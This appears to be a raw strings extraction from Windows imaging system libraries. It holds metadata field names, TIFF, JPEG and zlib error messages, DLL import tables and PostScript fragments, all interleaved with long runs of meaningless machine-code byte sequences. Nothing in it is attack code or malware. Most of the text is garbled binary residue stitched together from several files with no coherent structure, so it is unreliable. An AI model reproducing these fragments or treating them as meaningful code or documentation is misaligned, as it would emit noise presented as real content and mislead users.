IWICMetadataPolicyComponent IWICColorTransformOverride IWICMetadataQueryReaderInternal tnz !:gC tix$O 6 6Le s3_h UNICODE sModel Version Destination File Format File Format Version Service Identifier Envelope Number Product I.D. Envelope Priority Date Sent Time Sent Coded Character Set Arm Identifier Arm Version Record Version Object Type Reference Object Attribute Reference Object Name Edit Status Editorial Update Urgency Subject Reference Category Supplemental Category Fixture Identifier Keywords Content Location Code Content Location Name Release Date Release Time Expiration Date Expiration Time Special Instructions Action Advised Reference Service Reference Date Reference Number Date Created Time Created Digital Creation Date Digital Creation Time Originating Program Program Version Object Cycle By-line By-line Title City Sub-location Province/State Country/Primary Location Code Country/Primary Location Name Original Transmission Reference Headline Credit Source Copyright Notice Contact Caption Writer/Editor Rasterized Caption Image Type Image Orientation Language Identifier Audio Type Audio Sampling Rate Audio Sampling Resolution Audio Duration Audio Outcue ObjectData Preview File Format ObjectData Preview File Format Version ObjectData Preview Data Size Mode Max Subfile Size Object Data Size Announced Maximum ObjectData Size Subfile Confirmed ObjectData Size sExif Test sJFIF sfor strip byte offsets for chopped "StripByteCounts" array for chopped "StripOffsets" array for strip array %s: cannot handle zero scanline size %s: cannot handle zero tile size %s: cannot handle zero strip size WICTIFFReadDir sError post-encoding before directory write Error flushing data before directory write sPhotoshop Adobe_Photoshop ICC Profile sPNG group 1996-09-14 MSO aac sDllGetClassObject WerRegisterMemoryBlock Function: *** Assertion failed: %ls%ls%ls *** %s%ls%sSource: `%ls:%ld` Tag pseudo- %s: Invalid %stag "%d" (not supported by codec) Nonstandard tile width %d, convert file Nonstandard tile length %d, convert file %s: Invalid %stag "%s" (not supported by codec) %s: Failed to allocate space for list of custom values %s: Bad field type %d for "%s" %s: Bad value %d for "%s" %s: Bad value %ld for "%s" %s: Unknown %stag %u TIFFSetField %s: Cannot modify tag "%s" while writing _TIFFVGetField _TIFFVSetField No space %s Integer overflow in %s TIFFNumberOfStrips Invalid YCbCr subsampling TIFFVStripSize TIFFScanlineSize TIFFNumberOfTiles TIFFTileRowSize TIFFVTileSize %s: Too many bytes requested at scanline %lu, strip %lu %s: Seek error at scanline %lu, strip %lu %s: Read error at scanline %lu %lu: Row out of range, max %lu %lu: Sample out of range, max %lu %lu: Strip out of range, max %lu %lu: Tile out of range, max %lu %ld: Strip out of range, max %ld %lu: Invalid strip byte count, strip %lu %s: Data buffer too small to hold strip %lu %ld: Tile out of range, max %ld %s: Too many bytes requested at scanline %lu, tile %lu %s: Seek error at row %ld, col %ld, tile %ld %s: Read error at row %ld, col %ld; got %lu bytes, expected %lu %lu: Invalid tile byte count, tile %lu %s: Data buffer too small to hold tile %ld %s: Read buffer size is negative or 0 at scanline %ld %s: No space for data buffer at scanline %ld File not open for reading TIFFReadBufferSetup TIFFFillTile TIFFFillStrip TIFFSeekMaxBuffer "%s": Bad mode One of the client procedures is NULL pointer. %s: Out of memory (TIFF structure) Cannot read TIFF header Error writing TIFF header Not a TIFF or MDI file, bad magic number %d (0x%x) This is a BigTIFF file. This format not supported by this version of libtiff. Not a TI Huffman tables No space for Huffman table Huffman table too big Cannot allocate file buffer Cannot read file TIFFInitOJPEG Group3Options Group4Options Bits/sample must be 1 for Group 3/4 encoding/decoding %s: %s %s: Decoding error at scanline %d, %s %s: zlib error: %s %s: Not enough data at scanline %d (short %d bytes) %s: Encoder error: %s No space for ZIP state block TIFFInitZIP ZIPVSetField ZIPPostEncode ZIPEncode ZIPSetupEncode ZIPDecode ZIPSetupDecode LogL16Decode: sp->tbuf is too small LogL16Decode: data format not supported LogL16Decode: cc is too small LogL16Decode: Not enough data at row %d (short %d pixels) LogLuvDecode24: sp->tbuf is too small LogLuvDecode24: Not enough data at row %d (short %d pixels) LogLuvDecode32: sp->tbuf is too small LogLuvDecode32: cc is too small LogLuvDecode32: Not enough data at row %d (short %d pixels) LogLuvDecodeStrip: TIFFScanlineSize is 0 LogLuvDecodeTile: TIFFTileRowSize is 0 LogL16Encode: sp->tbuf is too small LogL16Encode: data format not supported LogLuvEncode24: sp->tbuf is too small LogLuvEncode24: data format not supported LogLuvEncode32: sp->tbuf is too small LogLuvEncode32: data format not supported LogLuvEncodeStrip: TIFFScanlineSize is 0 LogLuvEncodeTile: TIFFTileRowSize is 0 No support for converting user data format to LogL %s: No space for SGILog translation buffer SGILog compression cannot handle non-contiguous data No support for converting user data format to LogLuv must be either LogLUV or LogL Inappropriate photometric interpretation %d for SGILog compression; %s Y, L XYZ, Luv SGILog compression supported only for %s, or raw data Unknown data format %d for LogLuv compression Unknown encoding %d for LogLuv compression SGILogDataFmt SGILogEncode %s: No space for LogLuv state block TIFFInitSGILog LogLuvInitState LogL16InitState Horizontal differencing "Predictor" not supported with %d-bit samples Floating point "Predictor" not supported with %d data format "Predictor" value %d not supported Predictor Predictor: none horizontal differencing floating point predictor %u (0x%x) PredictorSetup #3R &'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz $3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz Bogus message code %d Sorry, there are legal restrictions on arithmetic coding ALIGN_TYPE is wrong, please fix MAX_ALLOC_CHUNK is wrong, please fix Bogus buffer control mode Invalid component ID %d in SOS DCT coefficient out of range IDCT output block size %d not supported Bogus Huffman table definition Bogus input colorspace Bogus JPEG colorspace Bogus marker length Wrong JPEG library version: library is %d, caller expects %d Sampling factors too large for interleaved scan Invalid memory pool code %d Unsupported JPEG data precision %d Invalid progressive parameters Ss=%d Se=%d Ah=%d Al=%d Invalid progressive parameters at scan script entry %d Bogus sampling factors Invalid scan script at entry %d Improper call to JPEG library in state %d JPEG parameter struct mismatch: library thinks size is %u, caller expects %u Bogus virtual array access Buffer passed to JPEG library is too small Suspension not allowed here CCIR601 sampling not implemented yet Too many color components: %d, max %d Unsupported color conversion request Bogus DAC index %d Bogus DAC value 0x%x Bogus DHT index %d Bogus DQT index %d Empty JPEG image (DNL not supported) Didn't expect more than one scan Fractional sampling not implemented yet Huffman code size table overflow Missing Huffman code table entry Maximum supported image dimension is %u pixels Empty input file Premature end of input file Internal error Cannot transcode due to multiple use of quantization table %d Scan script does not transmit all data Invalid color quantization mode change Not implemented yet Requested feature was omitted at compile time Huffman table 0x%02x was not defined JPEG datastream contains no image Quantization table 0x%02x was not defined Not a JPEG file: starts with 0x%02x 0x%02x Insufficient memory (case %d) Cannot quantize more than %d color components Cannot quantize to fewer than %d colors Cannot quantize to more than %d colors Invalid JPEG file structure: two SOF markers Invalid JPEG file structure: missing SOS marker Unsupported JPEG process: SOF type 0x%02x Invalid JPEG file structure: two SOI markers Invalid JPEG file structure: SOS before SOF Application transferred too few scanlines Unsupported marker type 0x%02x Virtual array controller messed up Image too wide for this implementation Caution: quantization tables are too coarse for baseline JPEG Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d Unknown APP0 marker (not JFIF), length %u Unknown APP14 marker (not Adobe), length %u Define Arithmetic Table 0x%02x: 0x%02x Define Huffman Table 0x%02x Define Quantization Table %d precision %d Define Restart Interval %u End Of Image %3d %3d %3d %3d %3d %3d %3d %3d JFIF APP0 marker: version %d.%02d, density %dx%d %d Warning: thumbnail image size does not match data length %u JFIF extension marker: type 0x%02x, length %u with %d x %d thumbnail image Miscellaneous marker 0x%02x, length %u Unexpected marker 0x%02x %4u %4u %4u %4u %4u %4u %4u %4u Quantizing to %d = %d*%d*%d colors Quantizing to %d colors Selected %d colors for quantization At marker 0x%02x, recovery action %d RST%d Smoothing not supported with nonstandard sampling ratios Start Of Frame 0x%02x: width=%u, height=%u, components=%d Component %d: %dhx%dv q=%d Start of Image Start Of Scan: %d components Component %d: dc=%d ac=%d Ss=%d, Se=%d, Ah=%d, Al=%d JFIF extension marker: JPEG-compressed thumbnail image, length %u JFIF extension marker: palette thumbnail image, length %u JFIF extension marker: RGB thumbnail image, length %u Unrecognized component IDs %d %d %d, assuming YCbCr Unknown Adobe color transform code %d Inconsistent progression sequence for component %d coefficient %d Corrupt JPEG data: %u extraneous bytes before marker 0x%02x Corrupt JPEG data: premature end of data segment Corrupt JPEG data: bad Huffman code Warning: unknown JFIF revision number %d.%02d Premature end of JPEG file Corrupt JPEG data: found marker 0x%02x instead of RST%d Invalid SOS parameters for sequential JPEG Application transferred too many scanlines sAmTb BKbhTb~XBK!; A!;I2 @ADEPQTU "" " "" !"#0123 @DHL "(* incorrect header check unknown compression method invalid window size unknown header flags set header crc mismatch invalid block type invalid stored block lengths too many length or distance symbols invalid code lengths set invalid bit length repeat invalid code -- missing end-of-block invalid literal/lengths set invalid distances set invalid literal/length code invalid distance code invalid distance too far back incorrect data check incorrect length check need dictionary stream end file error stream error data error insufficient memory buffer error incompatible version sASCII MbP? c?F%e? B.f? {/@7 B.F@ MbPA RSDS WindowsCodecs.pdb Pht? Ph@C PhRI Phdn _[^] tttS P _^] P,_[ ttrW tSVW x8u" !D$,!D$$!D$4!D$ T$ RW L$0Q3 L$8Qj t$4S L$8Qj t$4S |$0hP T$ RP L$$9L$,r D$(w ;D$ v ttxV suFW _^[] Y;zL FlPh Phd Ph4 QQSVW tt3V y(9u tY9E 9wXv, ;wXr D$\P L$HQj L$0Qj L$TQS L$0Qj L$ G,(> F(L> F,(> t9^,t F0Ph ^_[] ^_[] ^_[] ^_[] _^[] _^[] _^[] _^[] _^[] _^[] _^[] F,X? F,X? CPj`3 D$0t D$8PVVVV D$DP D$DP D$Lu 9L$h8 tt#W tt P u(VW G(dM G,@M G00M F(dM F,@M F00M uD!U _^[] "9^Tt SWRP D$ 8X 9^@uZ9^DuU9^HuP9^LtF T$$RP t$$3 L$4_^ D$,P Fp|N tQS QQSV3 ^[Y] t*Vh _^[] sPPh GIF8f D$$P t$$3 SV3 WTt? ;F,v ;^4v FDSW FHQP t09~`u+W f xY D$0S T$,RQ D$0h f9D$ <7u _^[] V8;J (SVW PPPj 9F4t Y_^[ gtfj ;FLs< 9F4t3 CTV3 ;AH| G@_^] Cp_^ 9Ndvw3 T;Ndr t^[] F@SW ;NLr PQWV _^[] _^[4 V8;J 9F4t- 9C4t FGC; M_^3 t(N_ VRSW @(^3 ;_(~f @(_3 \$ t) ItPI [_^] [_^] [_^] 9A$u 9Axu FHw!@ 9FPv^ ;FPr ;FPr F\H_[ _^[] V^uE 9G4t 9F4t 9F4t 9G4t 9G4t 9~4t 9F4t 9F4t- 9F4t- 9F4t t_^[] 9F4t 9F4t0 9F4t2 tC;] _^[] 9F4t 9F4t 9F4t- 9F4t2 9F4t/ _^[] 9F4t 9F4t/ 9F4t/ 9F4t- 9F4t- 9F4t3 9G4t 9G4t 9G4t 9G4t 9G4t 9G4t 9G4t 9G4t 9G4t 9G4t 9F4t 9F4t 9F4t 9F4t 9F4t 9G4t t_^] 9^dv T;~dr 9~dv _^[] u;S3 9N4t} ;~dr 9^dvo tC;^dr 9;v% C [_ T;Ndr HtDHtq t1Ht Hu>9 9F4t 9G4t4 9G4t2 9G4t6 9V4t 9F4t SWj0 9wPvr T;wPr t_^] 9w4^r tKHttH G4;GHr4 ^_[] su2V M SV _^[] t^[] _^[] @HPP @HPP _^[] HHJW vO)E ;FTu Fd;FPt< [_^] [_^] tbHtB t_^] s_^] s_^] s_^] ;FH|; ;V4| ;V4}% ;~4| T;rd 9V4~ ;V4| q4j0 G<_^] 9Wdvi ;Wdr 9Odvu ;Odr ;GLuc3 9GdvY ;Gdr ;A<}t3 9Wdve q4;Wdr ;A!~w w^!~w free malloc _callnewh _XcptFilter _amsg_exit _initterm msvcrt.dll _except_handler4_common _lock _unlock __dllonexit _onexit HPALETTE_UserUnmarshal HPALETTE_UserSize HICON_UserFree HICON_UserUnmarshal HBITMAP_UserSize HPALETTE_UserMarshal HICON_UserMarshal HBITMAP_UserMarshal HBITMAP_UserFree HPALETTE_UserFree HICON_UserSize HBITMAP_UserUnmarshal CLIPFORMAT_UserUnmarshal CLIPFORMAT_UserFree CLIPFORMAT_UserMarshal CLIPFORMAT_UserSize ole32.dll CStdStubBuffer_AddRef IUnknown_QueryInterface_Proxy NdrOleFree NdrStubForwardingFunction NdrOleAllocate CStdStubBuffer_CountRefs NdrStubCall2 IUnknown_Release_Proxy CStdStubBuffer_DebugServerQueryInterface CStdStubBuffer_QueryInterface IUnknown_AddRef_Proxy CStdStubBuffer_DebugServerRelease CStdStubBuffer_Disconnect CStdStubBuffer_IsIIDSupported NdrClientCall2 CStdStubBuffer_Invoke CStdStubBuffer_Connect NdrCStdStubBuffer_Release NdrCStdStubBuffer2_Release NdrDllGetClassObject RPCRT4.dll LeaveCriticalSection EnterCriticalSection DisableThreadLibraryCalls Sleep InterlockedExchange InterlockedCompareExchange QueryPerformanceCounter GetCurrentProcessId GetCurrentThreadId GetSystemTimeAsFileTime GetTickCount UnhandledExceptionFilter SetUnhandledExceptionFilter GetCurrentProcess TerminateProcess KERNEL32.dll DeleteCriticalSection InitializeCriticalSectionAndSpinCount GetLastError SetLastError InterlockedIncrement InterlockedDecrement GetFileType lstrcmpiW lstrcmpW UnmapViewOfFile GetSystemInfo MapViewOfFileEx RegQueryValueExW RegCloseKey RegOpenKeyExW RegEnumKeyExW RegEnumValueW WideCharToMultiByte CreateFileW SetEndOfFile CloseHandle WriteFile SetFilePointer GetFileSize GetFileInformationByHandle SetFilePointerEx ReadFile GlobalSize GlobalLock GlobalUnlock GlobalFree SleepEx GetStringScripts MultiByteToWideChar RaiseException GlobalAlloc GetVersionExW IsProcessorFeaturePresent LoadLibraryExW GetProcAddress HeapAlloc GetProcessHeap HeapFree GetModuleHandleW RtlCaptureStackBackTrace MulDiv LocalAlloc LocalFree _purecall qsort memmove realloc _vsnwprintf _aligned_malloc _aligned_free _wcsnicmp _wcsicmp wcsstr _stricmp _isnan strncmp memmove_s strcpy_s strstr rand fprintf ldexp wcschr iswalpha IsTextUnicode ADVAPI32.dll GetIconInfo GetGuiResources IsCharAlphaNumericA GetDC ReleaseDC IntersectRect IsRectEmpty EqualRect USER32.dll CreateCompatibleDC GetPaletteEntries GetDIBits DeleteDC GetObjectW DeleteObject CreateDIBSection SetDIBits GetDeviceCaps GDI32.dll IIDFromString CoCreateInstance CoTaskMemAlloc PropVariantClear StringFromGUID2 CoTaskMemFree CoLockObjectExternal GetHGlobalFromStream CreateStreamOnHGlobal PropVariantCopy CoGetApartmentType WinSqmIsOptedIn WinSqmAddToStream RtlInitializeBitMap RtlSetBits DbgPrintEx ntdll.dll RpcRaiseException FreeLibrary LoadLibraryExA DelayLoadFailureHook VirtualFree VirtualAlloc CreateFileMappingA memcpy memset _finite _CIatan2 _CIexp _CIlog _CIsqrt _ftol2 _ftol2_sse _seh_longjmp_unwind4 _setjmp3 memcmp !This program cannot be run in DOS mode. xxRich< .text `.data Shared .rsrc @.reloc qwn) qw2zsw7 qwCGqw[Gqw pw$~pw/ qw%-qw -qwNVrwe }swO qwblqwtNrw Rqwumrw 2tJY0tV JY0t E0tV "5tV [0t' F0tiL0tJY0t G0t3 J0twY0t$Z0t :t1L0tML0tiL0t 1t8W2t "5t}V2t 7tio2t "5t}V2t X2t!X2tEa7tV "5tV |6tV X2t!X2tEa7tV "5tV |6tV Y2tV 7t[X2t 8Z2t!X2tEa7tY |6tVY2t X2t!X2tEa7tV "5tV |6tV Y2tV 7tb[2tV 7tW[2t ^2t!X2tEa7t 3t$'3t 3tS^2tN\2t |6tc]2t 83tb[2t>\2t5\2t =3tRB3t9E3t =3tRB3t9E3t F3tEa7t X2t!X2tEa7t 03th "5t%p2t o2tEa7t Y2tX Cintl GDI+ Window GDI+ Accessibility GDI+ Hook Window Class GDI+ Hook Window `ff9@ ?^h6t 2t^h6t F0tiL0t |6tV 2tEa7t |6t` =8t]:8t |6t` |6tUh6tEa7t ><.3t!X2tEa7t 3tU"3t #3tu&3t "5t*=3t |6tV 3tb[2t{ 3tEa7tW[2tM Y@<.3t!X2tEa7t 3tU"3t #3tu&3t "5tP=3t |6tV 3tb[2t{ 3tEa7t \3t%\3t X3t_e3t MbP? 08t2*8t |6t= |6t= DirectDrawEnumerateExA DirectDrawCreateEx GetSurfaceFromDC ddraw.dll ExtTextOutA gdi32.dll GdiIsMetaPrintDC ExtTextOutW DISPLAY EnumDisplayDevicesA EnumDisplayMonitors GetMonitorInfoA GetAncestor GetWindowInfo user32.dll 5t|a5t a5t= 3t._5t% 5tLanguageLevel GetPrinterDriverA winspool.drv JY0tH |6tV "5tG |6tZ 7t`.4t *4t{ 8tI*4tU*4tn 3ta*4t '4t? d4tEd4tM n4t!a4tSa4tv|4t |4tGo4t 4t@ 4t 4t'!4t a4t+b4t #4tQ#4t #4t/$4t#&4tR&4t &4tc'4t 4tpf /;=5) F%5?B MbP? F4tN ?tbG4t ?u-5tu#5t *5t<+5t g5tV \5t1^5t b5tGl5t m5tIn5t*o5t p5toq5tQr5t&s5t t5t/u5t w5tkx5t2y5t~z5t |5td}5tn~5t ~5ta 5tB_5t 5tW_5t _5tl_5t 5tI`5t a5t"a5t@a5t^a5t 5t|a5t a5t|`5t 5t._5t% 5tEa7tEa7tEa7t |6tY Y2tp 5tDisplay EUDC\ FontSubstitutes L:.t h:.t t:.t :.tM \GDIPFONTCACHEV1.DAT SHGetFolderPathA ShFolder.DLL SHGetFolderPathW GdiplusFontCacheFileV1 2t^h6t1 2tjh6twh6t 2tUh6t |6tEa7t |6tEa7t |6tEa7t |6tEa7t |6tEa7t $@TNPPOA 7tEa7tV 7tTimes New Roman 6tEa7t 6t%MSEPS Preamble [Softek %d %d %d %d CB %s%d %d %d %d B newpath msOZMSOFFICE9.0 msOAMSOFFICE9.0 MS SANS SERIF \3t%\3t X3t_e3t X2t!X2tEa7t5 ,3tm,3t 3t8Z2t!X2tEa7tY |6tVY2t 8b7t9a7t 7tEa7tuq7ti:7t 6tNa7tEa7t 5t*.7tnk7t !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~ ;4:Y9s8 6{5i4N3*2 59t'/9t 59t'/9t UUUUUUUU |C9t @9t- |6t= 5tVs9t y9t] :tur9t+t9t/x9t r9t- 9t{z9t p?ff 9tstroke R@ SC } ifelse makepattern setpattern pd /PaintProc {begin %d %d 8 [1 0 0 1 0 0] datasrc false 3 colorimage end} put {/pd 20 dict def pd /PaintType 1 put pd /PatternType 1 put pd /TilingType 1 put pd /BBox [0 0 %d %d] put pd /XStep %d put pd /YStep %d put SC} /languagelevel where {pop languagelevel} {1} ifelse 1 eq /datasrc exch def %d readimage /readimage {currentfile exch string readhexstring pop} def [] 0 setdash ] %d setlinewidth 2 setlinejoin 1 setlinejoin setmiterlimit 0 setlinejoin setlinecap Ceofill fill setrgbcolor ?:t0123456789abcdef %s%d.%04d {setglobal} if } put /GSE {end grestore} def /NP {newpath} def /CP {closepath} def /SC {setrgbcolor} def /rc {rcurveto} def /rl {rlineto} def /c {curveto} def /l {lineto} def /m {moveto} def 16 dict begin gsave initclip /GpPBeg1 { 2 ge dup {currentglobal exch true setglobal globaldict} {userdict} ifelse /languagelevel where {pop languagelevel} {1} ifelse { 1 index { 0 %d %d 0 %d %d %d %d translate } for pop} for /im {/wid exch def /ofs exch def /nline exch def ocd /ds exch def 0 nline translate gsave ofs 0 translate wid 1 scale wid 1 true [wid 0 0 -1 0 1] ds imagemask grestore} bind def /ocd {() exch {zzsearch {expandzeros} {append exit} ifelse} loop} bind def <00FF> <0000> search {pop pop pop /zzsearch {zzsearch2} bind def} {pop /zzsearch {zzsearch1} bind def} ifelse /zzsearch2 {() exch {dup length 0 gt {dup 0 get 0 eq {dup length 1 gt {dup 1 get 0 eq {dup length 2 sub 2 exch getinterval <0000> 3 -1 roll true exit} if} if} if dup 0 get ( ) dup 0 4 -1 roll put 3 -1 roll exch append exch dup length 1 sub 1 exch getinterval} {pop false exit} ifelse} loop} bind def /zzsearch1 {<0000> search} bind def /expandzeros {3 1 roll pop dup 0 get exch dup length 1 sub 1 exch getinterval exch 2 add string 2 index exch append 4 2 roll pop exch append exch} bind def /append {1 index length dup 2 index length add string dup dup 6 2 roll 3 1 roll exch putinterval 0 exch putinterval} bind def /im {/hofs exch def /vofs exch def /wid exch def /hei exch def /datasize exch def /ds exch def gsave hofs vofs translate wid hei scale wid hei true [wid 0 0 hei neg 0 usp10.dll mso.dll F>tCG>t ScriptItemize ScriptBreak NumShape Control Panel\International XT>tnT>t T>tMX>t U>t4V>t t /S>tHS>t c>t7 1*:O H(AD L-z,}Y~S g"BM .GIF89aGIF87a EMF .IIMM .8p/t0 0p/t4p/tJ >tPp/t` o/tLo/t4o/t Hp/tLp/t >txp/t `p/tlp/t p/t@ p/tP /thn/t`n/tTn/tt0q/tp q/t(q/t >tHq/t /t\m/tTm/tHm/t,m/t @q/tDq/t CreateCodecInstance ?ttEa7t |6t$_?t G4tB ?tA]?tA]?t ?tEa7t \?tTk?to_?tXq?tCo?t >tEa7t s?tB ?t@t?t ?tA]?t ?tEa7t ?ttEa7t G4tB ?tA]?tA]?t ?tEa7t |6tL Y2t[ ?ttEa7t |6t;e?t z?tB ?tA]?t ?tEa7t \?tTk?t;f?t {?tCo?tc \?tan?tG >tEa7t |6t`|?t {?tB ?tA]?t ?tEa7t Y2t% \?tTk?tpg?t |?tCo?t ?tan?t |6tEa7t k?t: |6tEa7t ?tEa7t \?tTk?t F4tCo?t \?tan?t >tEa7t |6t$_?t G4tB ?tA]?tA]?t ?tEa7t ?ttEa7t s?tB ?t@t?t ?tA]?t ?tEa7t |6tL \?tTk?t F4tCo?t \?tan?t' >tEa7t G4tB ?tA]?tA]?t ?tEa7t Y2t| \?tTk?t t?tCo?tY \?tan?t >tEa7t |6t;e?t z?tB ?tA]?t ?tEa7t Y2tb ?ttEa7t |6t`|?t {?tB ?tA]?t |6tEa7t \?tTk?tpg?t |?tCo?t ?tan?t |6tEa7t k?t: r{o# ne\O f")@ ]5tp ?t3Q?tiR?t1T?t ?tA]?t ]5tO >tGetColorProfileFromHandle GetStandardColorSpaceProfileW DeleteColorTransform CloseColorProfile TranslateBitmapBits CreateMultiProfileTransform OpenColorProfileW OpenColorProfileA mscms.dll ?t"%?t 5tD&?tj&?t '?tu(?t )?t5)?t -?ts,?t 3tY.?t 0?t,;?t ?tA]?t ;?t/ NETSCAPE2.0 \?tTk?t F4tCo?t \?tan?tV 7tEa7t |6tV G4tB ?tA]?tA]?tS \?tTk?tpg?t |?tCo?t ?tan?tV |6tEa7t k?t: i?t/ !:gC @Qm6t ?tEa7t |6tV Y2t/ ANIMEXTS1.0 %04d:%02d:%02d %02d:%02d:%02d |6tEa7t g"DllGetClassObject @t"$@ts @tA&@t %@t3U@t a@tB`@t WE@t @F@t5F@t5F@tKF@tVF@t F@t5F@t5F@t G@taF@t IsProcessorFeaturePresent F0:s ?q.t 1Bru 3t9M HtgHtFHt%H 1Fnt Hu2h _^[] _[^] [_^] VtP= t'=W v?SV F0Pu ;C8u 9>u& t VP WWPW vSSVW I4V3 Ht0Ht"Ht I4V3 PhBGRs3 ,GEt 0GEt 0GEt tFHt9HtDH (SVW F`WP $2.t $2.t V`RP $2.t V`RP $2.t $2.t $2.t $2.t $2.t |D9{ PjTS .tSW $2.t t8It*It uN!E 9~0t 9~Xu WWPW ;w4t j [_^] _[^] ;{4t j j Af YVVf PjTW 9S,t= RVWP t WP PPWP V`RP 02.t 02.t 02.t 02.t 02.t 02.t ^_[] @_^] @_^] @_^] SVW3 @_^] 1Imgu 8Cu8 Kt&j PhBGRsj ,GEt L/.t 42.t 42.t t&Wj $2.t PVVVS X2.tQ PjTV SVWj _^[u `2.t `2.t `2.t `2.t FAIL^ `2.t `2.t `2.t `2.t `2.t `2.t DVWj .t_^ 1GrauW 4SVW .tWW .tWSV .tWV 1Gra .t9} PTh( 1Grau` u%j @u%j@ %x3.t t3.t p3.t l3.t h3.t d3.t `3.t \3.t X3.t T3.t P3.t L3.t H3.t D3.t @3.t <3.tP 83.t 43.t 03.t ,3.t (3.t $3.t 3.t j @f XVVf stVV 02.t 02.tS .t9u .t9u `2.t Ht+Ht Hu)Q 0.t^ 0.t^ 9^Ht!9 FEtu FTQQ _[^] 1.t3 Xj P 9K@u uJB9P t 9sXu u 9Fp 9^Xu3 t#9Fpt 9^0t 9{Du @_^] @_^] SVW3 @_^] @_^] @_^] $SVW u79} 1.t3 t{9{Xuv u^j P |Z9} 9P@u uAB9P 4.t 02.t 02.t 02.t P*.t 4.tQ 02.t 02.t 02.t P*.t 4.tQ u 9BSSh9@ PPPj WWh)@ H8.t FAIL (4.t^[ H8.t 9q4u 1dBm .t_^[] F`^] F`^] DEtW 1dBm EEt3 DEt3 1dBm 1dBm FAIL^ .t_^[ Pj(Y =3333w FAIL FAIL FAIL FAIL j\h0WDt FAIL DEt; WP9= EEtt FAIL FAIL FAIL QSVW QSVW Pj 3 HSVW 1XPa X_^[ GHtGHH 1XPa3 ;1XPau 1XPI_ FAIL F 9E ~FVj FAIL FAIL _[~U ~9V9M _^[] WWWR 9X,t uOSS @^_[ x49} u 9p0u 9r(t!3 1Pthu 1Pthu QQSV QVRQQ (SVW 8(Wre VQPR t(HtZHtNHu ; 1AFUu Sh FAIL PSSW tjSSSj tSSSSj @PV3 _^[] EEtt 1AFUu$Wh FAIL .tWV QWWWPS X`.t H0[_^ ^_[] 0b.t (b.t b.t h<.t xa.t pa.t ha.t xa.t `a.t Xa.t Pa.t Ha.t @a.t 8a.t 0a.t Ha.t Pa.t (a.t 8a.t Xa.t a.t 8b.t @b.t Et~ X>Et ,HEt ,HEt (HEtj .thp (HEt .thd =(HEt3 Et (HEt 4HEt =0HEt %0HEt %4HEt (HEt @_^[] 95X>Etu 8HEt; \>Et 8HEt; 8HEt; t>95\>Ett6 Dt1E Y__^[ Dt1E _^[] Dt^_[ `?Et \?Et X?Et T?Et 5P?Et =L?Etf x?Etf l?Etf H?Etf D?Etf %@?Etf -Et `>Et d>Et .thHb.t .th _^[] [_^] _^[] YFJu [_^] =P*.t QQVW p+.t QQVW p+.t QQVW p+.t _^[] H5.t P5.t X5.t ^_[] |-8M AEt^[] QQSV Xg.t Xg.t GWWSQP WWSQP QVPR .t_^[ 9_^[] j Y+ w_^3 SVW FAIL GpVP 1OGS FAIL_^ tEW3 FAIL^ 1OGS Dp.t |KVS hB`8tVh 1OGS FAIL^ tS9Y!9t 8tt) M8hp $+9t i(9t }*9t '&9t E49U M8VS M8hp Vhh%9t DtVP tH9] u 9} t ]89E 9M(t 9t9}(u 8tt P93u ,SVW t)h< PPSPPj J0Hu w_^[ H*.t 81dBm 9U(t X*.t X*.t =H*.t X*.t X*.t =H*.t _^[] 81dBm 9U(t PPP9 WWW9 x\_^] O IIt @_^[ |SVW uJj| SSSSS @_^[ Dt_^3 F1CvGu FAIL^ 91CvGu >1CvGu FAIL^ >1CvGu SSPj SSPj FAIL^[ F8^] 1dDr 1Pth 1CvG FAIL 1CvG G;~4s9 C@@G;~4r DEt= Ht~Ht t"~$ DEt= v SP t6j| 1dDr CEt3 CEtSW CEt3 CEtV 1dDr 1CvG 1CvGup 1CvGu~ FAIL ;F4u 8_^[] ^_[] .t~5V jH^V DEtV 1dDruzjd 81dBmu DEtt(9 DEtt VhD|9tPP 1dDr FAIL QSW3 EEtt>9] 1CvG_ W|fj .t_^ .tPS QQSVW .thI .tj W .tPW t!hI .tPS tA9} EEtu` QQSVW .thI .tj W .tPW t!hI FAIL FAIL >1CvGu FAIL^ >1CvGu% FAIL _^[] FAIL FAIL ?1CvGu FAIL [_^] FAIL QQSj .tSS u SS Ht7Ht)Ht .tSV .t9} F @A; @AG; ~(G@; u G@ F(+F$_@ tU9E tB9E F 9F _^[] 1PaI FAIL 1PaI FAIL t49~(t 9~(t t)9^(t 9~(t t89^(t t09^(t FAIL FAIL^ xDEt tDEt xDEt tDEt FAIL ^X^[ FAIL^ RPQS 1CvG RQPS 1Pth 1CvGuS FAIL .tSV v9SV ^[_] h0XDt hPXDt hpXDt t WV YY_^] W9u$t | +3+7 _^[] 9}$t |US3 [_^] M$Xf M,9E, =u-j! X4VWt 4A@; 9E$t M,9E, _^[3 ;>~@ >_^] 0r%f FFJJ;E FF;E |"9u |#9] 9] t 9]$t 9](t m/tV m/t _[^] FEtu Wj\j Vh$t/t F8Ph F4Ph Wh|s/t F u09_ Ht8] Ht8] E ~< (qKt 0qKt 9{9{Dup9{Huk9=< Ktt# 79{Du29=< Ktt# Y__^[ dwmapi.dll WindowsCodecs.dll WINSTA.dll CRYPTSP.dll DwmIsCompositionEnabled DwmDefWindowProc DwmExtendFrameIntoClientArea DwmSetWindowAttribute DwmGetWindowAttribute WICCreateImagingFactory_Proxy WinStationFreePropertyValue WinStationGetConnectionProperty CryptDestroyKey CryptDestroyHash CryptHashData CryptAcquireContextW CryptCreateHash CryptReleaseContext CryptImportKey CryptVerifySignatureW GDI32.dll USER32.dll KERNEL32.dll API-MS-Win-Security-Base-L1-1-0.dll API-MS-Win-Core-ProcessThreads-L1-1-0.dll API-MS-Win-Core-LocalRegistry-L1-1-0.dll ntdll.dll msvcrt.dll free _vsnwprintf memset _resetstkoflw _purecall _CIsqrt _CIatan __CxxFrameHandler3 fflush fputws fwprintf wcstoul strchr wcschr rand _wsplitpath_s _ftol2_sse floor memcpy _CIcos _except_handler4_common _amsg_exit _initterm memmove malloc _XcptFilter NtQueryEvent EtwEventWrite EtwEventEnabled RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlAcquireSRWLockShared RtlReleaseSRWLockShared RtlInitializeSRWLock EtwGetTraceEnableFlags EtwGetTraceEnableLevel EtwGetTraceLoggerHandle EtwRegisterTraceGuidsW EtwUnregisterTraceGuids EtwEventUnregister EtwEventRegister RtlGetThreadLangIdByIndex 